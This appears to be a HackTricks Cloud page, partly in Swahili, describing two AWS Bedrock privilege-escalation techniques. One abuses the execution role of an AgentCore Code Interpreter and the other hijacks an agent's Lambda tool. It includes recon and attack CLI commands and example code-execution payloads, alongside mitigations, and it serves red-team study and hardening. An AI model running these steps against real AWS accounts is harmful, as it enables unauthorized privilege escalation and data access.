AWS - Bedrock PrivEsc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Amazon Bedrock AgentCore

bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter - Code Interpreter Execution-Role Pivot

AgentCore Code Interpreter ni mazingira ya utekelezaji yanayosimamiwa. Custom Code Interpreters zinaweza kusanidiwa na executionRoleArn ambayo “hutoa permissions kwa code interpreter kufikia AWS services”.

Ikiwa lower-privileged IAM principal anaweza kianzisha + invoke Code Interpreter session iliyosanidiwa na more privileged execution role, mwitaji anaweza kwa ufanisi pivot kwenda kwenye permissions za execution role hiyo (lateral movement / privilege escalation kutegemea scope ya role).

Note

Hii kwa kawaida ni suala la misconfiguration / excessive permissions (kutoa wide permissions kwa interpreter execution role na/au kutoa broad invoke access). AWS inaonya wazi kuepuka privilege escalation kwa kuhakikisha execution roles zina equal or fewer privileges kuliko identities zinazoruhusiwa ku-invoke.

Preconditions (common misconfiguration)

• Kuna custom code interpreter yenye over-privileged execution role (mfano: access kwa sensitive S3/Secrets/SSM au capabilities zinazofanana na IAM-admin).
• Mtumiaji (developer/auditor/CI identity) ana permissions za:
• start sessions: bedrock-agentcore:StartCodeInterpreterSession
• invoke tools: bedrock-agentcore:InvokeCodeInterpreter
• (Optional) Mtumiaji pia anaweza create interpreters: bedrock-agentcore:CreateCodeInterpreter (humruhusu kuunda interpreter mpya iliyosanidiwa na execution role, kutegemea guardrails za org).

Recon (identify custom interpreters and execution role usage)

Orodhesha interpreters (control-plane) na kagua configuration yao:

aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>

Amri ya create-code-interpreter inasaidia --execution-role-arn ambayo inafafanua ni ruhusa gani za AWS ambazo interpreter itakuwa nazo.

Hatua ya 1 - Anzisha session (hii inarudisha sessionId, si interactive shell)

SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
--code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
--name "arte-oussama" \
--query sessionId \
--output text
)

echo "SessionId: $SESSION_ID"

Hatua ya 2 - Invoke code execution (Boto3 or signed HTTPS)

Hakuna interactive python shell kutoka start-code-interpreter-session. Execution hufanyika kupitia InvokeCodeInterpreter.

Option A - Boto3 example (execute Python + verify identity):

import boto3

client = boto3.client("bedrock-agentcore", region_name="<REGION>")

# Execute python inside the Code Interpreter session
resp = client.invoke_code_interpreter(
codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
sessionId="<SESSION_ID>",
name="executeCode",
arguments={
"language": "python",
"code": "import boto3; print(boto3.client('sts').get_caller_identity())"
}
)

# Response is streamed; print events for visibility
for event in resp.get("stream", []):
print(event)

Kama interpreter imewekwa na execution role, output ya sts:GetCallerIdentity() inapaswa kuonyesha identity ya role hiyo (si low-priv caller), ikionyesha pivot.

Option B - Signed HTTPS call (awscurl):

awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
--service bedrock-agentcore \
--region <Region> \
-d '{
"name": "executeCode",
"arguments": {
"language": "python",
"code": "print(\"Hello from AgentCore\")"
}
}'

Athari

• Lateral movement ndani ya yoyote AWS access ambayo interpreter execution role inayo.
• Privilege escalation ikiwa interpreter execution role ina privileges zaidi kuliko caller.
• Ugunduzi mgumu zaidi ikiwa CloudTrail data events kwa interpreter invocations hazijawezeshwa (invocations huenda zisirekodiwe kwa default, kutegemea configuration).

Mitigations / Hardening

• Least privilege kwenye interpreter executionRoleArn (itende kama Lambda execution roles / CI roles).
• Restrict who can invoke (bedrock-agentcore:InvokeCodeInterpreter) na nani anaweza kuanzisha sessions.
• Tumia SCPs kukataa InvokeCodeInterpreter isipokuwa kwa approved agent runtime roles (org-level enforcement inaweza kuwa ya lazima).
• Wezesha zinazofaa CloudTrail data events kwa AgentCore inapohitajika; toa alert kwa unexpected invocations na session creation.

Amazon Bedrock Agents

lambda:UpdateFunctionCode, bedrock:InvokeAgent - Agent Tool Hijacking via Lambda

Bedrock Agents zinaweza kutumia Lambda-backed action groups kama tools (external execution). Ikiwa principal anaweza modify code ya Lambda function inayotumiwa na agent, na kisha akaweza invoke agent, anaweza ku-execute attacker-controlled code chini ya Lambda execution role.

Note

Hii ni cross-service trust abuse (Bedrock → Lambda), si vulnerability. Attacker huenda asiweze ku-invoke Lambda moja kwa moja, lakini bado anaweza ku-trigger kupitia agent.

Preconditions (common misconfiguration)

• Kipo Bedrock Agent chenye action group backed by a Lambda function
• Attacker ana:
• lambda:UpdateFunctionCode
• bedrock:InvokeAgent
• Lambda execution role ina permissions pana zaidi kuliko attacker
• Attacker anaweza kutambua Lambda inayotumiwa na agent

Recon

Enumerate agent action groups:

aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT

Kagua Lambda:

aws lambda get-function --function-name <FUNCTION_NAME>

Utekelezaji

Badilisha code ya Lambda:

zip payload.zip lambda_function.py

aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip

Mfano wa payload:

import boto3

def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()

Tumia kupitia agent:

aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"

Athari

• Privilege escalation kwenda Lambda execution role
• Data exfiltration kutoka AWS services
• Cross-service abuse kupitia trusted agent execution

Mitigations

• Restrict lambda:UpdateFunctionCode
• Tumia Lambda roles za least-privilege
• Monitor mabadiliko ya Lambda code
• Audit matumizi ya Bedrock agent tool

References

• Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)
• Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)
• AWS CLI: create-code-interpreter (--execution-role-arn)
• AWS CLI: start-code-interpreter-session (returns sessionId)
• AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)
• AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)
• SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.